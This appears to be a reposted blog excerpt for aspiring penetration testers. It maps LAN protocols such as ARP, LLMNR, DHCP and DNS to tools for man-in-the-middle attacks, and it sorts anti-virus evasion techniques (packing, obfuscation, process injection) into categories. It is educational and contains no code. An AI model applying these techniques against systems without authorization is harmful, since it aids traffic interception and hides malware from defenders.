For some of you, MITM attacks may be a new concept, so here is a brief description. If a workstation is communicating with a server, and you are routing traffic between them, then you are the MITM. It's a great position to be in for monitoring and manipulating traffic. There are lots of ways to acquire a MITM position using a range of protocol attacks. To get you started, I've provided a list of 10 protocols and tools for attacking systems on a LAN.
- Address Resolution Protocol (ARP): Cain, ettercap, interceptor-ng, Subterfuge, easycreds
- NetBIOS Name Service (NBNS): MetaSploit and responder
- Link-local Multicast Name Resolution (LLMNR): MetaSploit and responder
- Pre-Execution Environment (PXE): MetaSploit
- Dynamic Trunking Protocol (DTP): Yersinia
- Spanning-Tree Protocol (STP): Yersinia, ettercap (lamia plugin)
- Hot Stand-by Router Protocol (HSRP): Yersinia
- Dynamic Host Configuration Protocol (DHCP): Interceptor, MetaSploit, manual setup
- Domain Name Services (DNS): MetaSploit, ettercap, dsniff, zodiac, ADMIdPack
- VLAN Tunneling Protocol (VTP): Yersinia, voiphopper, or modprobe+ifconfig

Anti-Virus Evasion
Anti-virus evasion is often a requirement during penetration testing. I personally break down AV evasion approaches into the four buckets below. I provided a list of keywords for each category to get your searches started. I'm also planning to release a few blogs down the line that will provide more options and actual examples.

Bypass Weak AV Configurations
Uninstall anti-virus, disable services, terminate processes, disable via the GUI, create an exception policy for all .exe files, or execute from external media.

Source Code Manipulation
Remove comments, randomize function and variable names, encode or encrypt content, delay execution of malicious code, use alternative functions, or insert superfluous functions that change execution flow.

Binary Manipulation
Bind with white listed applications, pack or compress, modify strings, modify resources, modify imports table, modify assembly to do things mentioned in source code manipulation. Common packers: upx, iexpress, and mpress.

Process Manipulation
Inject malicious code or DLLs into local or remote processes. Native languages can do it directly or through a managed code framework like .net. Powershell is a popular example that the MetaSploit team (amongst others) has been using a lot lately. Also, process manipulation is commonly done with python code that is converted to a portable executable.

Sursa: Resources for Aspiring Penetration Testers | NetSPI Blog